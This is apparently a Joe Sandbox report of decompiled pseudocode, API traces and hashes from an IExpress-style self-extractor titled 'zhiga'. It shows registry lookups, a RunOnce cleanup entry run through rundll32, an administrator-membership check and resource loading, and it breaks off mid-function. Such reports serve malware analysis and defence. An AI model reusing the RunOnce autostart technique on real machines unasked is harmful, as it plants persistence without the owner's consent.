                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                          • String ID: LoadString() Error. Could not load string resource.$zhiga
                                                          • API String ID: 3244514340-1120439489
                                                          • Opcode ID: 34df12721fdd623bfded8927412ec99e9f262b12970428d04cea87e138d90df3
                                                          • Instruction ID: 12de0d9944158db692273d8ff31cfa94be77873a9f1dd47ef98b325383ffb28f
                                                          • Opcode Fuzzy Hash: 34df12721fdd623bfded8927412ec99e9f262b12970428d04cea87e138d90df3
                                                          • Instruction Fuzzy Hash: 1251F7B1A00216ABDF219E68CD68BBA7BB8EF45300F004195FDC9E7245DB36D906DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E01092773(CHAR* __ecx, char* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v269;
                                                          				CHAR* _v276;
                                                          				int _v280;
                                                          				void* _v284;
                                                          				int _v288;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t23;
                                                          				intOrPtr _t34;
                                                          				int _t45;
                                                          				int* _t50;
                                                          				CHAR* _t52;
                                                          				CHAR* _t61;
                                                          				char* _t62;
                                                          				int _t63;
                                                          				CHAR* _t64;
                                                          				signed int _t65;
                                                          
                                                          				_t52 = __ecx;
                                                          				_t23 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t23 ^ _t65;
                                                          				_t62 = _a4;
                                                          				_t50 = 0;
                                                          				_t61 = __ecx;
                                                          				_v276 = _t62;
                                                          				 *((char*)(__ecx)) = 0;
                                                          				if( *_t62 != 0x23) {
                                                          					_t63 = 0x104;
                                                          					goto L14;
                                                          				} else {
                                                          					_t64 = _t62 + 1;
                                                          					_v269 = CharUpperA( *_t64);
                                                          					_v276 = CharNextA(CharNextA(_t64));
                                                          					_t63 = 0x104;
                                                          					_t34 = _v269;
                                                          					if(_t34 == 0x53) {
                                                          						L14:
                                                          						GetSystemDirectoryA(_t61, _t63);
                                                          						goto L15;
                                                          					} else {
                                                          						if(_t34 == 0x57) {
                                                          							GetWindowsDirectoryA(_t61, 0x104);
                                                          							goto L16;
                                                          						} else {
                                                          							_push(_t52);
                                                          							_v288 = 0x104;
                                                          							E01091781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                          							_t59 = 0x104;
                                                          							E0109658A( &_v268, 0x104, _v276);
                                                          							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                          								L16:
                                                          								_t59 = _t63;
                                                          								E0109658A(_t61, _t63, _v276);
                                                          							} else {
                                                          								if(RegQueryValueExA(_v284, 0x1091140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                          									_t45 = _v280;
                                                          									if(_t45 != 2) {
                                                          										L9:
                                                          										if(_t45 == 1) {
                                                          											goto L10;
                                                          										}
                                                          									} else {
                                                          										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                          											_t45 = _v280;
                                                          											goto L9;
                                                          										} else {
                                                          											_t59 = 0x104;
                                                          											E01091680(_t61, 0x104,  &_v268);
                                                          											L10:
                                                          											_t50 = 1;
                                                          										}
                                                          									}
                                                          								}
                                                          								RegCloseKey(_v284);
                                                          								L15:
                                                          								if(_t50 == 0) {
                                                          									goto L16;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return E01096CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                          			}























                                                          0x01092773
                                                          0x0109277e
                                                          0x01092785
                                                          0x0109278a
                                                          0x0109278d
                                                          0x01092790
                                                          0x01092792
                                                          0x01092798
                                                          0x0109279d
                                                          0x010928b2
                                                          0x00000000
                                                          0x010927a3
                                                          0x010927a3
                                                          0x010927af
                                                          0x010927c2
                                                          0x010927c8
                                                          0x010927cd
                                                          0x010927d5
                                                          0x010928b7
                                                          0x010928b9
                                                          0x00000000
                                                          0x010927db
                                                          0x010927dd
                                                          0x010928aa
                                                          0x00000000
                                                          0x010927e3
                                                          0x010927e3
                                                          0x010927ec
                                                          0x010927f8
                                                          0x01092803
                                                          0x0109280b
                                                          0x01092831
                                                          0x010928c3
                                                          0x010928c9
                                                          0x010928cd
                                                          0x01092837
                                                          0x0109285a
                                                          0x0109285c
                                                          0x01092865
                                                          0x01092892
                                                          0x01092895
                                                          0x00000000
                                                          0x00000000
                                                          0x01092867
                                                          0x01092878
                                                          0x0109288c
                                                          0x00000000
                                                          0x0109287a
                                                          0x01092880
                                                          0x01092885
                                                          0x01092897
                                                          0x01092899
                                                          0x01092899
                                                          0x01092878
                                                          0x01092865
                                                          0x010928a0
                                                          0x010928bf
                                                          0x010928c1
                                                          0x00000000
                                                          0x00000000
                                                          0x010928c1
                                                          0x01092831
                                                          0x010927dd
                                                          0x010927d5
                                                          0x010928e5

                                                          APIs
                                                          • CharUpperA.USER32(08A9C601,00000000,00000000,00000000), ref: 010927A8
                                                          • CharNextA.USER32(0000054D), ref: 010927B5
                                                          • CharNextA.USER32(00000000), ref: 010927BC
                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092829
                                                          • RegQueryValueExA.ADVAPI32(?,01091140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092852
                                                          • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01092870
                                                          • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010928A0
                                                          • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010928AA
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010928B9
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010927E4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                          • API String ID: 2659952014-2428544900
                                                          • Opcode ID: c0454feecf8a06ceb888e6d2f8f1d204e74da8cdcffbbd2fb3908a3841c8607d
                                                          • Instruction ID: 22dbf7266e1cc9a28c1518194a0eac2e3aa0be07300de8a84570ac5344a20fd4
                                                          • Opcode Fuzzy Hash: c0454feecf8a06ceb888e6d2f8f1d204e74da8cdcffbbd2fb3908a3841c8607d
                                                          • Instruction Fuzzy Hash: 6441BFB0A01128ABDF259A649CA5AFE7BBCEB55700F0040E9F5C9D7104CB758E81ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 62%
                                                          			E01092267() {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v836;
                                                          				void* _v840;
                                                          				int _v844;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t19;
                                                          				intOrPtr _t33;
                                                          				void* _t38;
                                                          				intOrPtr* _t42;
                                                          				void* _t45;
                                                          				void* _t47;
                                                          				void* _t49;
                                                          				signed int _t51;
                                                          
                                                          				_t19 =  *0x1098004; // 0x8a9c601
                                                          				_t20 = _t19 ^ _t51;
                                                          				_v8 = _t19 ^ _t51;
                                                          				if( *0x1098530 != 0) {
                                                          					_push(_t49);
                                                          					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                          						_push(_t38);
                                                          						_v844 = 0x238;
                                                          						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                          							_push(_t47);
                                                          							memset( &_v268, 0, 0x104);
                                                          							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                          								E0109658A( &_v268, 0x104, 0x1091140);
                                                          							}
                                                          							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          							E0109171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                          							_t42 =  &_v836;
                                                          							_t45 = _t42 + 1;
                                                          							_pop(_t47);
                                                          							do {
                                                          								_t33 =  *_t42;
                                                          								_t42 = _t42 + 1;
                                                          							} while (_t33 != 0);
                                                          							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                          						}
                                                          						_t20 = RegCloseKey(_v840);
                                                          						_pop(_t38);
                                                          					}
                                                          					_pop(_t49);
                                                          				}
                                                          				return E01096CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                          			}



















                                                          0x01092272
                                                          0x01092277
                                                          0x01092279
                                                          0x01092283
                                                          0x01092289
                                                          0x010922ab
                                                          0x010922b1
                                                          0x010922c4
                                                          0x010922e0
                                                          0x010922e6
                                                          0x010922f5
                                                          0x0109230d
                                                          0x0109231c
                                                          0x0109231c
                                                          0x01092321
                                                          0x0109233a
                                                          0x01092342
                                                          0x01092348
                                                          0x0109234b
                                                          0x0109234c
                                                          0x0109234c
                                                          0x0109234e
                                                          0x0109234f
                                                          0x0109236e
                                                          0x0109236e
                                                          0x0109237a
                                                          0x01092380
                                                          0x01092380
                                                          0x01092381
                                                          0x01092381
                                                          0x0109238f

                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010922A3
                                                          • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 010922D8
                                                          • memset.MSVCRT ref: 010922F5
                                                          • GetSystemDirectoryA.KERNEL32 ref: 01092305
                                                          • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0109236E
                                                          • RegCloseKey.ADVAPI32(?), ref: 0109237A
                                                          Strings
                                                          • wextract_cleanup1, xrefs: 0109227C, 010922CD, 01092363
                                                          • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0109232D
                                                          • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01092299
                                                          • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01092321
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                          • API String ID: 3027380567-1226499438
                                                          • Opcode ID: 366f73fca01500649c3cabf941a0f4d39777a8601195aa126cdd65873d70e6da
                                                          • Instruction ID: 4abd9eeee0fb61aa230870ec496d27dde95f4e84f3e9659127ec265462b9a332
                                                          • Opcode Fuzzy Hash: 366f73fca01500649c3cabf941a0f4d39777a8601195aa126cdd65873d70e6da
                                                          • Instruction Fuzzy Hash: 0531D471A00218BBDF719A65DC59FEA7B7CEB55740F0040EAB58DEA100EA71AB88DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E01093100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				void* _t8;
                                                          				void* _t11;
                                                          				void* _t15;
                                                          				struct HWND__* _t16;
                                                          				struct HWND__* _t33;
                                                          				struct HWND__* _t34;
                                                          
                                                          				_t8 = _a8 - 0xf;
                                                          				if(_t8 == 0) {
                                                          					if( *0x1098590 == 0) {
                                                          						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                          						 *0x1098590 = 1;
                                                          					}
                                                          					L13:
                                                          					return 0;
                                                          				}
                                                          				_t11 = _t8 - 1;
                                                          				if(_t11 == 0) {
                                                          					L7:
                                                          					_push(0);
                                                          					L8:
                                                          					EndDialog(_a4, ??);
                                                          					L9:
                                                          					return 1;
                                                          				}
                                                          				_t15 = _t11 - 0x100;
                                                          				if(_t15 == 0) {
                                                          					_t16 = GetDesktopWindow();
                                                          					_t33 = _a4;
                                                          					E010943D0(_t33, _t16);
                                                          					SetDlgItemTextA(_t33, 0x834,  *0x1098d4c);
                                                          					SetWindowTextA(_t33, "zhiga");
                                                          					SetForegroundWindow(_t33);
                                                          					_t34 = GetDlgItem(_t33, 0x834);
                                                          					 *0x10988b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                          					SetWindowLongA(_t34, 0xfffffffc, E010930C0);
                                                          					return 1;
                                                          				}
                                                          				if(_t15 != 1) {
                                                          					goto L13;
                                                          				}
                                                          				if(_a12 != 6) {
                                                          					if(_a12 != 7) {
                                                          						goto L9;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				_push(1);
                                                          				goto L8;
                                                          			}









                                                          0x01093108
                                                          0x0109310b
                                                          0x010931b7
                                                          0x010931ca
                                                          0x010931d0
                                                          0x010931d0
                                                          0x010931da
                                                          0x00000000
                                                          0x010931da
                                                          0x01093111
                                                          0x01093114
                                                          0x01093136
                                                          0x01093136
                                                          0x01093138
                                                          0x0109313b
                                                          0x01093141
                                                          0x00000000
                                                          0x01093143
                                                          0x01093116
                                                          0x0109311b
                                                          0x0109314b
                                                          0x01093151
                                                          0x01093158
                                                          0x0109316a
                                                          0x01093176
                                                          0x0109317d
                                                          0x0109318b
                                                          0x0109319e
                                                          0x010931a3
                                                          0x00000000
                                                          0x010931ad
                                                          0x01093120
                                                          0x00000000
                                                          0x00000000
                                                          0x0109312a
                                                          0x01093134
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01093134
                                                          0x0109312c
                                                          0x00000000

                                                          APIs
                                                          • EndDialog.USER32(?,00000000), ref: 0109313B
                                                          • GetDesktopWindow.USER32 ref: 0109314B
                                                          • SetDlgItemTextA.USER32(?,00000834), ref: 0109316A
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 01093176
                                                          • SetForegroundWindow.USER32(?), ref: 0109317D
                                                          • GetDlgItem.USER32(?,00000834), ref: 01093185
                                                          • GetWindowLongA.USER32(00000000,000000FC), ref: 01093190
                                                          • SetWindowLongA.USER32(00000000,000000FC,010930C0), ref: 010931A3
                                                          • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010931CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                          • String ID: zhiga
                                                          • API String ID: 3785188418-3705506974
                                                          • Opcode ID: 2d1496c58ec6c3f956cb86beb89a3ee71ce1b1e2f15a2b7fd64b9722a52b8714
                                                          • Instruction ID: e1697d3895e6d2b9e0a05c61576a794e18c6062ede8088f7bfc9fafadd95cdaf
                                                          • Opcode Fuzzy Hash: 2d1496c58ec6c3f956cb86beb89a3ee71ce1b1e2f15a2b7fd64b9722a52b8714
                                                          • Instruction Fuzzy Hash: 0F11E4B1208221FBDF315F389C2CB5A3AB4FB4A720F004211F9E1DA1E4D77A8141EB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E010918A3(void* __edx, void* __esi) {
                                                          				signed int _v8;
                                                          				short _v12;
                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                          				char _v20;
                                                          				long _v24;
                                                          				void* _v28;
                                                          				void* _v32;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				signed int _t23;
                                                          				long _t45;
                                                          				void* _t49;
                                                          				int _t50;
                                                          				void* _t52;
                                                          				signed int _t53;
                                                          
                                                          				_t51 = __esi;
                                                          				_t49 = __edx;
                                                          				_t23 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t23 ^ _t53;
                                                          				_t25 =  *0x1098128; // 0x2
                                                          				_t45 = 0;
                                                          				_v12 = 0x500;
                                                          				_t50 = 2;
                                                          				_v16.Value = 0;
                                                          				_v20 = 0;
                                                          				if(_t25 != _t50) {
                                                          					L20:
                                                          					return E01096CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                          				}
                                                          				if(E010917EE( &_v20) != 0) {
                                                          					_t25 = _v20;
                                                          					if(_v20 != 0) {
                                                          						 *0x1098128 = 1;
                                                          					}
                                                          					goto L20;
                                                          				}
                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                          					goto L20;
                                                          				}
                                                          				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                          					L17:
                                                          					CloseHandle(_v28);
                                                          					_t25 = _v20;
                                                          					goto L20;
                                                          				} else {
                                                          					_push(__esi);
                                                          					_t52 = LocalAlloc(0, _v24);
                                                          					if(_t52 == 0) {
                                                          						L16:
                                                          						_pop(_t51);
                                                          						goto L17;
                                                          					}
                                                          					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                          						L15:
                                                          						LocalFree(_t52);
                                                          						goto L16;
                                                          					} else {
                                                          						if( *_t52 <= 0) {
                                                          							L14:
                                                          							FreeSid(_v32);
                                                          							goto L15;
                                                          						}
                                                          						_t15 = _t52 + 4; // 0x4
                                                          						_t50 = _t15;
                                                          						while(EqualSid( *_t50, _v32) == 0) {
                                                          							_t45 = _t45 + 1;
                                                          							_t50 = _t50 + 8;
                                                          							if(_t45 <  *_t52) {
                                                          								continue;
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						 *0x1098128 = 1;
                                                          						_v20 = 1;
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          			}


















                                                          0x010918a3
                                                          0x010918a3
                                                          0x010918ab
                                                          0x010918b2
                                                          0x010918b5
                                                          0x010918be
                                                          0x010918c0
                                                          0x010918c6
                                                          0x010918c7
                                                          0x010918ca
                                                          0x010918cf
                                                          0x010919c9
                                                          0x010919d8
                                                          0x010919d8
                                                          0x010918df
                                                          0x010919b8
                                                          0x010919bd
                                                          0x010919bf
                                                          0x010919bf
                                                          0x00000000
                                                          0x010919bd
                                                          0x010918fa
                                                          0x00000000
                                                          0x00000000
                                                          0x01091912
                                                          0x010919aa
                                                          0x010919ad
                                                          0x010919b3
                                                          0x00000000
                                                          0x01091927
                                                          0x01091927
                                                          0x01091932
                                                          0x01091936
                                                          0x010919a9
                                                          0x010919a9
                                                          0x00000000
                                                          0x010919a9
                                                          0x0109194c
                                                          0x010919a2
                                                          0x010919a3
                                                          0x00000000
                                                          0x0109196e
                                                          0x01091970
                                                          0x01091999
                                                          0x0109199c
                                                          0x00000000
                                                          0x0109199c
                                                          0x01091972
                                                          0x01091972
                                                          0x01091975
                                                          0x01091984
                                                          0x01091985
                                                          0x0109198a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0109198c
                                                          0x01091991
                                                          0x01091996
                                                          0x00000000
                                                          0x01091996
                                                          0x0109194c

                                                          APIs
                                                            • Part of subcall function 010917EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010918DD), ref: 0109181A
                                                            • Part of subcall function 010917EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0109182C
                                                            • Part of subcall function 010917EE: AllocateAndInitializeSid.ADVAPI32(010918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010918DD), ref: 01091855
                                                            • Part of subcall function 010917EE: FreeSid.ADVAPI32(?,?,?,?,010918DD), ref: 01091883
                                                            • Part of subcall function 010917EE: FreeLibrary.KERNEL32(00000000,?,?,?,010918DD), ref: 0109188A
                                                          • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010918EB
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 010918F2
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0109190A
                                                          • GetLastError.KERNEL32 ref: 01091918
                                                          • LocalAlloc.KERNEL32(00000000,?,?), ref: 0109192C
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 01091944
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01091964
                                                          • EqualSid.ADVAPI32(00000004,?), ref: 0109197A
                                                          • FreeSid.ADVAPI32(?), ref: 0109199C
                                                          • LocalFree.KERNEL32(00000000), ref: 010919A3
                                                          • CloseHandle.KERNEL32(?), ref: 010919AD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                          • String ID:
                                                          • API String ID: 2168512254-0
                                                          • Opcode ID: ed49103aabe69f881496f433c60f48381fd3ecb375ac60ee39cb4303919eb559
                                                          • Instruction ID: 5787e26ae16e92a58864cf78317e60e3c605285875b1cd8b928698d50700a382
                                                          • Opcode Fuzzy Hash: ed49103aabe69f881496f433c60f48381fd3ecb375ac60ee39cb4303919eb559
                                                          • Instruction Fuzzy Hash: AD314871B0020AEBDF209FA9DCA8AAFBBBCFF45320B104469F685D2144D7369904DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E0109468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                          				long _t4;
                                                          				void* _t11;
                                                          				CHAR* _t14;
                                                          				void* _t15;
                                                          				long _t16;
                                                          
                                                          				_t14 = __ecx;
                                                          				_t11 = __edx;
                                                          				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                          				_t16 = _t4;
                                                          				if(_t16 <= _a4 && _t11 != 0) {
                                                          					if(_t16 == 0) {
                                                          						L5:
                                                          						return 0;
                                                          					}
                                                          					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                          					if(_t15 == 0) {
                                                          						goto L5;
                                                          					}
                                                          					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                          					FreeResource(_t15);
                                                          					return _t16;
                                                          				}
                                                          				return _t4;
                                                          			}








                                                          0x01094699
                                                          0x0109469b
                                                          0x010946a9
                                                          0x010946af
                                                          0x010946b4
                                                          0x010946bc
                                                          0x010946f9
                                                          0x00000000
                                                          0x010946f9
                                                          0x010946d9
                                                          0x010946dd
                                                          0x00000000
                                                          0x00000000
                                                          0x010946e5
                                                          0x010946ef
                                                          0x00000000
                                                          0x010946f5
                                                          0x010946ff

                                                          APIs
                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                          • SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                          • LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                          • LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                          • memcpy_s.MSVCRT ref: 010946E5
                                                          • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                          • String ID: TITLE$zhiga
                                                          • API String ID: 3370778649-3314309
                                                          • Opcode ID: 3f11eb1c4126bdf7246ab7979a009be430b2e013b224ffe52bbc22f07f17ff26
                                                          • Instruction ID: 3ed2804da25d43a7191802758943849b8310e7fdd4c1a9b2bc8c9b65d39f65fc
                                                          • Opcode Fuzzy Hash: 3f11eb1c4126bdf7246ab7979a009be430b2e013b224ffe52bbc22f07f17ff26
                                                          • Instruction Fuzzy Hash: 1C01D672344210FBE73016A96D1DF2B3E6CEBC9B61F040054FBC9C7144C966884593E2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E010917EE(intOrPtr* __ecx) {
                                                          				signed int _v8;
                                                          				short _v12;
                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                          				_Unknown_base(*)()* _v20;
                                                          				void* _v24;
                                                          				intOrPtr* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t14;
                                                          				_Unknown_base(*)()* _t20;
                                                          				long _t28;
                                                          				void* _t35;
                                                          				struct HINSTANCE__* _t36;
                                                          				signed int _t38;
                                                          				intOrPtr* _t39;
                                                          
                                                          				_t14 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t14 ^ _t38;
                                                          				_v12 = 0x500;
                                                          				_t37 = __ecx;
                                                          				_v16.Value = 0;
                                                          				_v28 = __ecx;
                                                          				_t28 = 0;
                                                          				_t36 = LoadLibraryA("advapi32.dll");
                                                          				if(_t36 != 0) {
                                                          					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                          					_v20 = _t20;
                                                          					if(_t20 != 0) {
                                                          						 *_t37 = 0;
                                                          						_t28 = 1;
                                                          						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                          							_t37 = _t39;
                                                          							 *0x109a288(0, _v24, _v28);
                                                          							_v20();
                                                          							if(_t39 != _t39) {
                                                          								asm("int 0x29");
                                                          							}
                                                          							FreeSid(_v24);
                                                          						}
                                                          					}
